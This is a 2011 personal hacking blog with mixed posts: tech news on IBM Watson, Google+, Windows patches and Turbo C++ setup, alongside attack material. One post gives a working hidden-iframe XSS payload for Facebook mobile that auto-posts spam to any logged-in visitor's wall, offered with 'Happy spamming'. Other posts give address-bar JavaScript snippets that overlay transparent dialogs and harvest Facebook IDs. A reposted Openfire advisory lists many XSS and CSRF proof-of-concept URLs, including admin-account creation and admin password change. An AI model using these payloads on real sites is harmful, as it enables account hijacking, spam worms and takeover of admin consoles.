hahahah amol hacked ur ip address

Sign by Danasoft - For Backgrounds and Layouts

Author

Amol Bhure (ultra l33t) was born in Maharashtra, Seventh July Of Nineteen Hundred Nineteen Ninety A.D. He's currently pursuing his B.E in Bangalore. A cyber Security Professional, Hacker, Designer, Programmer. Keen interest in hacking and network security and he developed several techniques of defending and defacing websites. He's of the opinion that people should learn this art to prevent any cyber attacks. Currently Amol works as a member of 'Null International', Bangalore chapter as a network security guy. Apart from this, he has done internships at YAHOO! India, AMAZON India, etc. He has also attended various International conferences like NullCon GOA, c0c0n, ClubHack, Defcon , SecurityByte, ICFoCS, OWASP, etc.. He is certified with RHCE, LPT, CEH v7, SCJP, AFCEH. In programming he knows stuffs on C, C++, C# , JAVA (SCJP), .NET , and PHP. Additionally he knows few hardware languages like HDL, VHDL, Verilog, Embedded Micro controller Programming. He has been featured on google hall of fame. Amol was named a "India's top 10 hacker" by google. "World's top 50 hacking blog" by google.

Daily Page Views

Tuesday, August 23, 2011

Watson Computers : Next Generation of Computer



Watson is an artificial intelligence computer system capable of answering questions posed in natural language.
Developed by IBM.
What is Watson : Follow the story of the development of Watson from a modest DeepQA machine to a formidable Jeopardy! contestant. Watch the videos below to see how Watson represents a leap forward in data analytics and how this technology will impact business and industry.







The Science Behind an Answer....
The challenge in building a computer system like Watson lies in developing its ability to understand the language of a clue,
register the intent of a question,
scour millions of lines of human language, and return a single, precise answer - in less than three seconds.
Find out what is going on inside the Watson mainframe to accomplish this feat.
“We all want to know the right answers to questions. And it isn't the same thing as searching for possibilities or options, which we do everyday."









Why Jeopardy!?...
The game of Jeopardy! makes great demands on its players – from the range of topical knowledge covered to the nuances in language employed in the clues.
Can the analytical power of a computer system – normally accustomed to executing precise requests – overcome these obstacles?
Can the troves of knowledge written in human terms become easily searchable by a machine in order to deliver a single, precise answer?
Can a quiz show help advance science?
“IBM is not in the entertainment business. But we are in the business of technology and pushing frontiers.”



A System Designed for Answers....
Operating on a single CPU, it could take Watson two hours to answer a single question.
A typical Jeopardy! contestant can accomplish this feat in less than three seconds.
For Watson to rival the speed of its human competitors in delivering a single,
precise answer to a question requires custom algorithms,
terabytes of storage and thousands of POWER7 computing cores working in a massively parallel system.
Watch to find out how building smarter systems like Watson involves optimizing hardware and software into a solution greater than the sum of its parts.
“The POWER7 system is tuned for very rapid deep analytics of massively parallel problems.”







The Next Grand Challenge...
Over the last century, IBM has reached numerous scientific breakthroughs through its commitment to research and its tradition of Grand Challenges.
These Grand Challenges work to push science in ways that weren’t thought possible before.
Jeopardy! The IBM Challenge poses a specific question with very real business implications:
Can a system be designed that applies advanced data management and analytics to natural language in order to uncover a single,
reliable insight — in a fraction of a second?
“We look at areas where there's an enormous gap in current capability and use that as a challenge. We call them Grand Challenges.”





Preparing Watson for the Jeopardy! stage posed a unique challenge to the team: 
how to represent a system of 90 servers and hundreds of custom algorithms for the viewing public.
The result? A dynamic visual avatar based on the smarter planet icon. A speaking voice that clearly pronounces a vast vocabulary. 
And an answer panel that reveals the system’s top responses and confidence levels. Watch the video to find out more about each of these elements






Watson was optimized to tackle a specific challenge: competing against the world’s best Jeopardy! contestants. 
Beyond Jeopardy!, the IBM team is working to deploy this technology across industries such as healthcare, finance and customer service.





After competing against the two greatest Jeopardy! champions of all time, 
the technology behind Watson will now be applied to some of the world’s most enticing challenges.
Watch the video for a breakdown of the match from the IBM team members as they look toward the future. 
Ken Jennings and Brad Rutter also weigh in about the accomplishment.








Monday, August 22, 2011

All Important Things About Google+


This isn’t every single thing there is to know about Google+. That could probably be a book rather than an article, and the Google+ Project has only just begun. If Google has its way, it will live on for years. Or it could go the Google Wave route. It’s just too early to tell.
amol-hackinglibrary.blogspot.com
Do you think Google+ will succeed? .
While we’ll no doubt learn plenty more about Google+ as time goes on, here are some quick nuggets to get you a little more acquainted with it.


  1. Google+ is currently available on an invitation-only basis.
  2. Google does not consider it a Facebook competitor (at least publicly).
  3. Google+ is currently available for download as an app in the Android Market.
  4. When you download that app, it splits off the “Huddle” feature as a separate app.
  5. Users can post status updates, and these appear on the Google Profile under a tab called “Posts”. The +1’s and Buzz tabs remain separate. I have to wonder if we’ll see Buzz and Posts merge eventually.
  6. What is available now is “just the beginning” according to Google. These are just the first features or presumably many more to come.
  7. Circles is one current feature. It lets you share things with different people (kind of like Facebook Groups) but with a very different user interface.. Watch above 1st video:
  8. Another feature is Sparks. This looks for 2nd videos and articles it thinks you’ll like, so “when you’re free, there’s always something to watch, read, and share..
  9. Hangouts is another feature. It’s basically group video chat. Google describes it as “the unplanned meet-up.”
  10. Instant uploads is a mobile-specific feature. Photos upload themselves as you take them, and are stored in a private area on the cloud.
  11. Huddle is another group-conversation feature for mobile. Essentially, it’s group chat.
  12. The Stream
    1. The stream is basically the equivalent of the Facebook news feed.
    2. When you share something with Google+ it’s added to your stream and the stream of everyone you shared with.
    3. The stream shows you what all of your Circles have shared with you.
    4. If you mention a user, using the “+” or “@” symbols, the person may receive a notification that you mentioned them.
    5. You can see who specific posts were shared with in the stream – whether they were shared publicly, to extended circles, or a limited group.
    6. You can filter the stream by specific Circles.
    7. You can chat directly in the stream
    8. You can report inappropriate content.
    9. You can search for people from the search box at the top of the stream.
    10. Soon, Google says you’ll be able to search the stream itself from the search box.
    11. If you leave comments on a post, you can edit or delete them.
    12. The same goes for posts, but you can’t edit a post’s sharing settings after the post has been shared. However, you can delete the post and share again to different circles.
    13. You can “reshare” posts made by others (like retweeting).
    14. You can “mute” a post. This will let you stop receiving updates from a post, like if the comments get out of control for example.
    The Google Social Network
    1. You can use the “Google+ Bar” that appears at the top of various Google products as your connection to the social network.
    2. When you’re signed in you’ll see your full name or email address displayed with a photo or avatar next to it, to help you identify which account you’re currently signed in to.
    3. If you’ve enabled multi sign-in you can sign in to two different Google accounts and switch between them using the Google+ bar.
    4. When you sign up for Google+, you’re also signing up for Picasa Web Albums, so all photos and videos uploaded to Google+ (including from your phone via Instant Upload) will also be available in Picasa Web Albums.
    5. You can use the Google +1 button from the stream.
    6. You can have a ton of friends on Google+. Robert Scoble quickly added over 1,000.
    7. The central user interface is very Facebook-esque.
    8. Google+ quickly became the butt of a lot of jokes (and even cartoons), but has also received a great deal of praise thus far... above image
    9. With Google+ Google adds a “You” link to the recently redesigned (painted black) navigation bar across Google properties
    10. You can view public Google+ content without actually being invited (Danny Sullivan has a guide on how to view it )
    11. China is already blocking Google+. That didn’t take long.
    12. Invitations have been listed on eBay.
    13. There are already privacy concerns about Google+ but the Privacy Guide can be found here.
    14. According to the Financial Times article, you can share something within a closed “Circle,” but somone from that circle can then reshare it with anyone, and even make it public.
    15. Is Google+ destined to bring real competition to Facebook or will the hype fade? Share your thoughts here in the comment box.
    16. thank u :)

HI friends after a long break me comeback ...

I got few message from  known and unknown peoples.  Regarading G+. So i'm going to post few important things about GOOGLE PLUS (G+).. enjoy :)

Saturday, May 21, 2011

Run Linux In Web Browser Using JavaScript

Ever wanted to try out UNIX commands without actually installing the Linux operating system? Well, say thanks to the Javascript Guru Fabrice Bellard who’s solved the problem for you. Now you can emulate the entire Linux based PC right in your browser without needing to install the operating system. The solution is perfect for those who are curious to learn UNIX commands and have a better understanding of how the command line interface works but do not have direct access to a Linux system.














Fabrice claims that he created the PC emulator just for fun. He wanted to try his hand at something ‘a little more challenging. He says that the most modern versions of Javascript are fast enough and capable of doing complicated tasks. His emulator can be used to benchmark Javascript engines or use it for client side processing using x86 library. A more advanced version of emulator can be used to run the DOS based PC software and play old DOS games....@amol

Friday, May 6, 2011

Custom Tag on Facebook Comment





A couple months a go, facebook added a new function that enables their users to tag their friends on their comment system. By default you can do that simply by typing @ and type any letter then list of your friends with that particular letter will show up. But how about create a custom tag for your friends name? for example, You have a friend named John, you can tag John with another name, for example Amol. Interesting, right? You can play more with this trick, for example make your comment fully clickable to your own fan page, etc. Just be more creative.
With this trick, you can even tag people who are not friends with you, as long as you have their facebook ID. Ok, let’s start to show you how to do this. Simply put your comment with this format:


@@[0:[facebook id:0:tag name]]


Facebook ID is the unique id identifying every facebook profile, you can read and find out how to get the facebook id on this post :How To Find Facebook ID
    Tag Name would be your custom text, this way you can link to your friends’ facebook profile but with whatever text you want


    example:
    @@[[0:[100001884789734:0:dont no who is he]] Your commeent is here

    With this code, you can tag my profile (Amol Bhure) but with (dont no who is he) as the anchor text. Preview :


      Cool isn’t it? Please note that if it doesnt show as it should be, the tag is not clickable or not on the blue colored format, you need to refresh the page, it will show you what you want to see.
      That’s all, happy connecting with Facebook :)


      Thursday, April 28, 2011







      If you are an admin of a facebook fan page or a facebook application page you can find the Suggest to Friends link on the left bottom part of the page for application page, while for a fan page, you can find it on the top right of your page. You can easily click the link to suggest your page to your friends. But the problem is, when you are not an admin of a certain page, you cant now find the link on that page. It was not like this before, Suggest to Friends was actually an Invite Friends link on the old version of a fan page/application page. Anyone could invite their friends at that time even when they’re not the admin.(amol)
      Now it’s a little bit hard to suggest a facebook page to our friends when your not the admin. Many people ask, How to show Facebook Suggest to Friends Dialog ?. Well, we can use javascript address bar hack to show the dialog. using this simple code, the dialog will show whenever you click on any part of the page. @mol The link will show transparently overlayed in front of the page. Here is the script :


      javascript:(function(){x=$('content').innerHTML;y=x.indexOf('_id');y=x.substring(y+4,y+27);x=y.substring(0,y.indexOf('"'));y=document.createElement('div');y.style.cssText='position:fixed;z-index:9;height:100%;';y.innerHTML='<a rel="dialog-post" href="http://amol-hackinglibrary.blogspot.com/" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&node_id='+x+'" class="UIImageBlock_Content" style="color:transparent;height:10000px">ultral33t amol</a>';z=document.getElementsByTagName('div')[0];z.parentNode.insertBefore(y,z);alert('Now click anywhere on this page, suggest page dialog will show – ultral33t amol');})()







      1. Copy the code above
      2. Go to the page you want to suggest, for example : Facebook GIF Animated Application
      3. Paste the code on the address bar
      4. Then press enter
      5. An alert will show, just click OK or press enter
      6. Click anywhere on that page, the Facebook Suggest to Friends Dialog will show

      HOW TO FIND FACEBOOK ID.











      What is facebook ID? it’s a unique number identifying a facebook profile, facebook groups or fan pages.@mol : As you can see from other facebook profile, here’s an example for Facebook Bold Text profile URL :
      http://www.facebook.com/profile.php?id=139701732734451


      See the url above, 139701732734451 is the facebook id. we will discuss about how to get the id. Below are some javascript address bar tricks you can use to find facebook id. @mol : You can get your own facebook id, your friends facebook id, or facebook groups/fan pages id programmatically.

      To find your own facebook id, simply put this code on the address bar then press enter :

      javascript:alert('Your ultral33t amol Facebook ID : '+Env['user'])




      For friends facebook id, or facebook groups/fan pages id, simply go to the destination profile, then paste the code on the address bar. you can use one of these codes ;


      1.If your profile or your friends/facebook page profile has profile picture, not the default silhouette one, use this :


      javascript:x=$('profile_pic').src;y=x.substr(x.indexOf('_')+1);alert('ultral33t amol Facebook ID : '+y.substr(0,y.indexOf('_')))


      2.This one is using facebook share link, we will get its link then get the profile id programmatically. You can use this if you can see share link on its profile page. here’s the code :


      javascript:x=$('content').getElementsByTagName('a');for(i=0;i<x .length;i++)if(x[i].href.indexOf('[]')>1){y=x[i].href;alert('ultral33t amol Facebook ID : '+y.substr(y.indexOf('[]')+3));break};void(0)


      3.And this is using xhpc_targetid, one of the form elements for sending message to destination wall. You can use this if you can post to the destination profile :


      javascript:x=document.forms;for(i=0;i<x .length;i++){if(document.forms[i].xhpc_targetid){alert('Facebook ID : '+document.forms[i].xhpc_targetid.value);break}};void(0)



      There are lots more tricks to see facebook id, but we cant discuss them all here. bcz some ppls are copying data and using for unwanted things . amol: plz dont copy . Some of the examples above will be enough for you to get the id.
      Happy tweaking :):)

      @amol


      Friday, April 15, 2011

      Autopost Spamming using Facebook Mobile XSS



      @amol: What has happened out there really pushes me to share this out. I call this an Autopost Spamming using Facebook Mobile XSS. I dont care anymore if this one will be filtered, the faster they fix it, the better. People dont seem to care how hard i tried to hide this code from facebook team. frankly, i also use this to post spam with link to this blog, but it only affects indonesian ip + with a custom interval. So people outside indonesia wont be able to see this. Too bad it’s now spread like a worm everywhere wide open without any source code protection....@mol
      Nevermind, it’s no use to complain about what has happened anyway. Let’s talk about this in details. This is about how to make an autopost status update to people’s facebook profile. This method uses XSS vulnerability of prompt_feed.php from m.facebook.com. When people see our page with this evil code, they will automatically post a status update with any message we want.
      Below is the iframe HTML source code :


      <iframe id="amol-hackinglibrary" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://tinyurl.com/ultral33t-amol Wow.. amol cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>


      Put the code above on your website, change the red code with your own message. Whenever facebook logged in users see your page the message will be posted automatically to their wall.
      That’s all. Happy spamming :(


      @mol



      Sunday, March 20, 2011

      Window 7 Service Pack 1

      The release of window 7 first pack is going to meet the user demands. The pack that has been released by Microsoft aims at addressing OS nips and tucks. This new software is readily available for download. Security systems and bug fixes are the new programs that have come up with this software. In most cases, they will appear on your screen as window updates. Incase you want to be the first to enjoy the services; you can get its free download from Microsoft web site. You can also get it through windows updates. If the above methods are not convenient for you, you can install it in your system by use of a DVD installed with the full pack.



      The installation process is well outlined for you on Microsoft website. Installing the software takes short time giving a safe and reliable program to work with. Several changes have come up with SP1. After installing the program, you will be able to make audio adjustment for HDMI by use of the bug. Inmost cases these services fail to work due to frequent restarting of the computer. Your prints are going to be clear and use of one format in the production. After restoring folders you will be able to access them at there original place. In most cases once, you restore deleted folders they appear in cascading order. This is not the case once you installed your machine with XP1.
      For the enterprise users, it is not always necessary to use service pack 1 to install the final version of internet explorer 9. If you do not have this pack, you can rely on the services of IE9. It helps you in installing additional operating systems that are in the first pack. Many computer owners enjoy a wide range of services offered by window 7 since it also have a back up system. This reduces the work of having it on external hard drive.

      Windows 8 Remains a Mystery as Microsoft Anticipates Surging Market Demands

      Microsoft has always had surprises for its customers. They have a very special trend for software development. It is quite difficult to anticipate what they will roll out whenever they announce such a move. For example, the upgrade of Windows 1.0 to Windows 7 came as a surprise to many.





      A close look at the development of the Windows brand of software reveals that Microsoft is dynamic. Some customers still complain about the compatibility of the Windows operating system with other computer applications but truth be told, Windows is a great brand. Recently, the corporation unveiled Windows 7, which ideally is an upgrade of Windows version 1.0. This displays the corporations intend to solve the compatibility aspects that most users of the former version have pointed out.
      What Microsoft is doing is laudable; it is a mechanism of identifying the pitfalls and shortcomings of its applications in attempt to better its software to meet the demands of the market currently. The world is going technological, if it has not already done so. The Chief Executive Officer of the corporation, Mr. Steve Ballmer hinted that Windows is undergoing evolution. It is in doubt whether this will interfere with the release of the chain of the operating system.
      The CEO intimated that the software would undergo massive changes in the future that will make its look very different from the way it does today. He emphasized that the software in the future will be very different from its current look. Currently, the software works just fine. In fact, it is the most common software and the best so far. It is very easy to use and manipulate towards the performance of different tasks.
      Currently, Microsoft is working on Windows 8.The corporation has not disclosed the features of the software yet. From the words of the CEO, we can anticipate a unique product that encompasses major improvements of the previous operating systems and that meets the current requirements of the market.

      Microsoft, Mozilla, Adobe and Foxit Bugs and Their Critical Patches


      Several software companies are releasing a whole range of patches and quick fixes for all the little bugs that are appearing on their laptops and PCs. Although Microsoft has reached a record one patch for the most recent cycle, this patch proves to be a pretty important one considering that it will fix a bug allows online hackers to steal information and possibly take over your computer once you view a compromised website.
      This patch basically attempts to resolve the errors in Internet Explorer 5 for Windows 2000; Internet Explorer 6 for Windows XP; and Internet Explorer 7 for Windows Vista and XP. It seems like this may also affect Internet Explorer 8 as well, although it has not been necessary for the more robust version that came out with Windows 7. All of these patches are readily available online and can be gotten by simply running the Windows Update on your PC.
      Microsoft
      There are also two patches that are being released to fix a bug that could possibly assist in eliciting a PC attack through MS Office’s MS Excel and MS Word compromised files. One of the most vulnerable versions of Office to this kind of hit is Office 2000 because once the attacker is able to get into the system, he can implement any command at his bidding. Other versions that may be susceptible are the Office XP version as well as Office 2003 and Office 2007, as well as the 2004 and 2008 versions created for the Mac.
      Microsoft Works is also undergoing some problems which Microsoft also needs to resolve, specifically for MS Works converters and file for the Office versions in 2000, XP, 2003 and 2007. This is also required for the Microsoft versions of 9 and 8.5.
      The windows Printer Spool is also another area infected with bugs and giving those using Windows 2000 a way into a system that is not firewall protected. If an attack were to be successful on a Windows 2000 version, it would only pose moderate threats to other Windows versions. Although Microsoft has released some patches, these fixes are only there to fix lesser problems compared to these mentioned that need immediate attention.
      Mozilla
      After the release of Firefox 3.5 by the Mozilla group mid-year of 2009, not having this version may open you up to some threats. If you still have Firefox 3.0, then the least you should do is to get the 3.0 update in its latest most recent version. This Firefox 3.0 fix responds to at least four crucial bugs that have appeared in Javascript, three of which impinge on the SeaMonkey Suite and two that compromise the Thunderbird email application. To get these updates, go to the Help section of Firefox and click on the Check for Updates option to be sure that you are using the Firefox 3.0.11 version or at least the 1.1.17 version of SeaMonkey and 2.0.0.22 version of Thunderbird.
      Adobe
      As for Adobe, the problem is in the Shockwave Player version 11.5.0.596 or any earlier version of it. Some websites have manipulated Adobe Director files that would allow an attacker to take over your PC and have full control over it. The best remedy to this, as suggested by Adobe, is to install the latest version of Shockwave Player and completely uninstall the older version, at least just to get you out of harm’s way.
      Some effective updates have been released for the Reader and Acrobat (versions 9.1.2 or 7.1.3 or 8.1.6). This update prevents any loopholes for a PC takeover even if you have a compromised PDF file. The best way to get the updated it to go to Help, click on Check for Updates and check if you have the latest version of Reader and Acrobat. This updated is now available for Unix, Macintosh, and Windows systems.
      Foxit
      For those using the Foxit Reader PDF application, you may need to get a patch by going to Help and clicking on About Foxit Reader  and making sure that you at least have Foxit Reader 3.0 build 1817 on your computer. Without the latest version, there will be a threat to your JPEG2000/JBIG2 Decoder add-ons and the Foxit Reader 3.0 base program. You can easily download the latest version of Foxit Reader online. To find out about your add-ons, go to the help option and the Check for Updates. This will at least get the the add-on updates, but will not update your Foxit Reader version, so do that separately.

      How to install Turbo C++ on Windows 7 64bit

      Few days ago we have posted an article about installing Turbo C++ on 32 bit Windows 7. Now we are providing step-by-step procedure how to install Turbo C++ on 64 bit Windows 7.
      1. Install the software DOSBox ver 0.73 :
      2. Create a folder,for example „Turbo“ (c:\Turbo\)
      3. Download and extract TC into the Turbo folder (c:\Turbo\):
      http://blog.bestsoftware4download.com/goto/http://s1.freedownloadme.info/turboc_installed.zip 
      4. Run the DOSBox 0.73 from the icon located on the desktop




      5. Type the following commands at the command prompt [Z]: mount d c:\Turbo\ [The folder TC is present inside the folder Turbo
      Now you should get a message which says: Drive D is mounted as a local directory c:\Turbo\



      6. Type d: to shift to d:



      7. Next follow the commands below:
      cd tc
      cd bin
      tc or tc.exe [This starts you the Turbo C++ 3.0]


      8. In the Turbo C++ goto Options>Directories> Change the source of TC to the source directory [D] ( i.e. virtual D: refers to original c:\Turbo\ . So make the path change to something like D:\TC\include and D:\TC\lib respectively )

      How to start TurboC++ in the DOSBox automatically:

      You can save yourself some time by having DOSBox automatically mount your folders and start TurboC++:
      or DOSBox versions older then 0.73 browse into program installation folder and open the dosbox.conf file in any text editor. For version 0.73 go to Start Menu and click on “Configuration” and then “Edit Configuration“. Then scroll down to the very end, and add the lines which you want to automatically execute when DOSBox starts.
      Automatically mount and start Turbo C++3.0 in DOSBox ver 0.73:


      Scroll down to the very end, and add the lines:


      Those commands will be executed automatically when DOSBox starts!
      Please note:
      Full screen: Alt and Enter
      When you exit from the DosBox [precisely when u unmount the virtual drive where Turbo C++ 3.0 has been mounted] all the files you have saved or made changes in Turbo C++ 3.0 will be copied into the source directory(The directory which contains TC folder)
      Don’t use shortcut keys to perform operations in TC because they might be a shortcut key for DOSBOX also . Eg : Ctrl+F9 will exit DOSBOX rather running the code .


      Saturday, February 19, 2011

      Multiple XSS and XSRF issues in Openfire 3.6.4

      I recently (read: last month) disclosed several security issues with Ignite Realtime's Openfire v3.6.4. The following links are the original advisory postings and the exploit code:
      http://www.securityfocus.com/bid/45682
      http://secunia.com/advisories/42799
      http://packetstormsecurity.org/files/author/8144/
      http://www.exploit-db.com/exploits/15918/

      The following is the condensed disclosure document for the vulnerabilities.:
      Title: Multiple XSS and CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section
      --------------------------------------------------------------------

      Project: Openfire
      Severity: High
      Versions: 3.6.4 (other versions may be affected)
      Exploit type: Multiple XSS and CSRF
      Fixes Available: None
      --------------------------------------------------------------------

      Timeline:
      14 October 2010: Vendor Contacted
      15 October 2010: Vendor Response received. Asks to verify the issues in beta.
      28 October 2010: Informed Vendor that multiple pages are still vulnerable
      03 November 2010: Acknowledgement / Update requested
      03 November 2010: Update recevied. No fixes initiated.
      23 November 2010: Informed vendor disclosure date set to 1/12/2010
      22 December 2010: Update requested.
      22 December 2010: Vendor asks to release information as the vulnerabilities are already known
      23 December 2010: A different contact at the Vendor location informs that there are no updates.
      24 December 2010: Disclosure date set to 5 January 2011
      05 January 2011: Disclosed to the Security Community via Bugtraq, Full disclosure and Secunia
      --------------------------------------------------------------------

      Product Description:
      Openfire is a real time collaboration (RTC) server licensed under the Open Source GPL. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Openfire is incredibly easy to setup and administer, but offers rock-solid security and performance.
      (Source: http://www.igniterealtime.org/projects/openfire/)
      --------------------------------------------------------------------

      Affected Files/Locations/Modules:
      XSS:
      login.jsp
      security-audit-viewer.jsp
      user-create.jsp
      plugins/search/advance-user-search.jsp
      user-roster-add.jsp
      user-roster.jsp
      group-create.jsp
      group-edit.jsp
      group-delete.jsp
      muc-room-edit-form.jsp
      muc-room-delete.jsp
      plugins/clientcontrol/create-bookmark.jsp
      plugins/clientcontrol/spark-form.jsp

      CSRF:
      user-create.jsp
      user-password.jsp
      user-delete.jsp
      group-create.jsp
      group-edit.jsp
      group-delete.jsp

      ---------------------------------------------------------------------

      Vulnerability Details:
      User can insert HTML or execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.
      Successful exploitation of these vulnerabilities could result in, but not limited to, compromise of the application, theft of
      cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.

      Since the vulnerabilities exisit in the administrative module, a sucessful attack could cause a complete compromise of the entire application.

      An attacker can also force a user into executing functions that add/delete/modify users and groups without the knowledge of the user.
      ----------------------------------------------------------------------

      Proof of Concept:
      Persistent XSS:
      http://target-url/login.jsp?url=&username=test" onfocus=javascript:window.location.assign('http://www.google.com');">

      http://target-url/login.jsp?url=hello" onfocus=javascript:window.location.assign('http://www.google.com');">

      http://target-url/security-audit-viewer.jsp?range=15&username="><script>alert('xss')</script>&search=Search

      http://target-url/user-create.jsp?username=test"><script>alert('xss')</script>
      http://target-url/user-create.jsp?name=test"><script>alert('xss')</script>
      http://target-url/user-create.jsp?email=test"><script>alert('xss')</script>

      http://target-url/plugins/search/advance-user-search.jsp?criteria=test"><script>alert('xss')</script>

      http://target-url/user-roster-add.jsp?username=test<script>alert('xss')</script>
      http://target-url/user-roster-add.jsp?username=user&jid=1&nickname=<script>alert('XSS')</script>&email=<script>alert('XSS')</script>&add=Add+Item

      http://target-url/user-roster.jsp?username=test<script>alert(document.cookie)</script>
      http://target-url/user-lockout.jsp?username=test<script>alert('xss')</script>

      http://target-url/group-create.jsp?name=test<script>alert('xss')</script>&description=<script>alert('xss')</script>&create=Create+Group

      http://target-url/group-edit.jsp?creategroupsuccess=true&group=test<script>alert('xss')</script>

      http://target-url/group-delete.jsp?group=<script>alert('xss')</script>


      http://target-url/muc-room-edit-form.jsp?save=true&create="><script>alert('XSS')</script>&roomconfig_persistentroom="><script>alert('XSS')</script>&roomName=23&mucName=conference&roomconfig_roomname=<script>alert('XSS')</script>&roomconfig_roomdesc=<script>alert('XSS')</script>&room_topic=<script>alert('XSS')</script>&roomconfig_maxusers="><script>alert('XSS')</script>&roomconfig_presencebroadcast=<script>alert('XSS')</script>true&roomconfig_presencebroadcast2="><script>alert('XSS')</script>&roomconfig_presencebroadcast3=true"><script>alert('XSS')</script>&roomconfig_roomsecret="><script>alert('XSS')</script>&roomconfig_roomsecret2="><script>alert('XSS')</script>&roomconfig_whois=moderator"><script>alert('XSS')</script>&roomconfig_publicroom=true"><script>alert('XSS')</script>&roomconfig_canchangenick=true"><script>alert('XSS')</script>&roomconfig_registration=true"><script>alert('XSS')</script>&Submit=Save+Changes

      http://target-url/muc-room-delete.jsp?roomJID="><script>alert('XSS')</script>&create=false

      http://target-url/plugins/clientcontrol/create-bookmark.jsp?urlName="><script>alert('XSS')</script>&url="><script>alert('XSS')</script>&users="><script>alert('XSS')</script>&groups="><script>alert('XSS')</script>&rss=off&createURLBookmark=Create&type=url

      http://target-url/plugins/clientcontrol/spark-form.jsp?optionalMessage=</textarea><script>alert('XSS')</script>&submit=Update+Spark+Versions


      Stored XSS:
      http://target-url/group-create.jsp
      http://target-url/group-summary.jsp
      Method: Navigate to http://target-url/group-create.jsp, and create a new group with the following details.
      Group Name: Test<script>alert("xss")</script>
      Description: Test<script>alert("xss")</script>
      Click on Create Group, you will be greeted with multiple alert boxes. Click on Group Summary from the left pane or navigate to http://target-url/group-summary.jsp to be greeted again by multiple alert boxes completing the PoC.


      CSRF:
      For the following links, create html pages with image tags with scr= the following links and ask the user to view these pages. If a user is logged into Openfire's admin console and the HTML pages are viewed then the respective functions are called:
      http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User
      http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User>
      http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password
      http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password>
      http://target-url/user-delete.jsp?username=tester&delete=Delete+User
      http://target-url/user-delete.jsp?username=tester&delete=Delete+User>
      http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group
      http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group>
      http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add
      http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add>
      http://target-url/group-edit.jsp?group=NewGroup&admin=abc@example.com&updateMember=Update
      http://target-url/group-edit.jsp?group=NewGroup&admin=abc@example.com&updateMember=Update>

      Tuesday, February 1, 2011

      Free XSS flaws detection service..!!

      Cross-site scripting (XSS) errors are responsible for more than half of all web application vulnerabilities1. So, in this age of accountability and expectations for secure, high quality software, what’s being done about it?

      Veracode announced their Free XSS Detection Service which empowers global developers and security professionals to quickly and easily identify dangerous and costly XSS vulnerabilities, while offering remediation recommendations to produce higher security web applications.

      OWASP includes XSS on its list of the Top 10 most dangerous software risks, and despite the high prevalence, Veracode is certain that XSS vulnerabilities can be easily eliminated once detected.

      Veracode Free XSS Detection Service removes perceived complexity from the detection process, and with access to proper education and training, developers can avoid introducing the flaws into software in the first place.

      According to OWASP, XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser that can hijack user sessions, deface web sites, or redirect the user to malicious sites.

      Here’s how the Veracode Free XSS Detection Service works:

          * Sign up for a Free XSS Detection Service account
          * Users submit one Java application, free of charge
          * The Veracode platform will search for XSS errors and produce a detailed report with location and remediation information
          * Participants will also receive complimentary access to Veracode’s dedicated XSS eLearning courses.

      “At Veracode, we see thousands — sometimes tens of thousands — of XSS vulnerabilities a week. Many are those we describe as ’trivial’ and can be fixed with a single line of code. Some of our customers upload a new build the following day; others never do. Motivation is clearly a factor,” said Chris Eng, senior director of security research, Veracode.

      “Think about the XSS vulnerabilities that hit highly visible websites such as Facebook, Twitter, MySpace and others. Sometimes those companies push XSS fixes to production in a matter of hours. Are their developers really that much better? Of course not. The difference is how seriously the business takes it. When they believe it’s important, you can bet it gets fixed.”

      @mol

      New malware strains wreaking havoc on Facebook..!!






      PandaLabs announced the discovery of security exploits via popular social media sites Facebook and Twitter. In the last several days, two new malware strains have been wreaking havoc on Facebook users.

      The first, Asprox.N, is a Trojan delivered via email informing users their Facebook account is being used to distribute spam and that, for security reasons, the login credentials have been changed.

      The email includes a fake Word document attachment, supposedly containing the new password, with an unusual icon and the filename Facebook_details.exe.

      Deceiving victims by opening a .doc file upon opening the attachment, this file is really a Trojan that downloads another file designed to open all available ports, connecting to mail service providers in an attempt to spam as many users as possible.

      The second new malware strain, Lolbot.Q, is distributed across instant messaging applications such as AIM or Yahoo!, with a message displaying a malicious link.

      Clicking the link downloads a worm designed to hijack Facebook accounts, blocking users' access while informing that the account has been suspended.

      To "reactivate" their account, users are asked to complete a questionnaire, promising prizes such as laptops and iPads. After several questions, users are asked to subscribe and enter their cell phone number, which is in turn charged a fee of $11.60 per week.

      Victims can restore access to their Facebook account only once they subscribe to the service and receive a new password.

      "Once again cybercriminals are using social engineering to trick victims and infect them with malware," said Luis Corrons, technical director of PandaLabs. "Given the increasing popularity of social media, it is no surprise that it is being exploited to lure victims."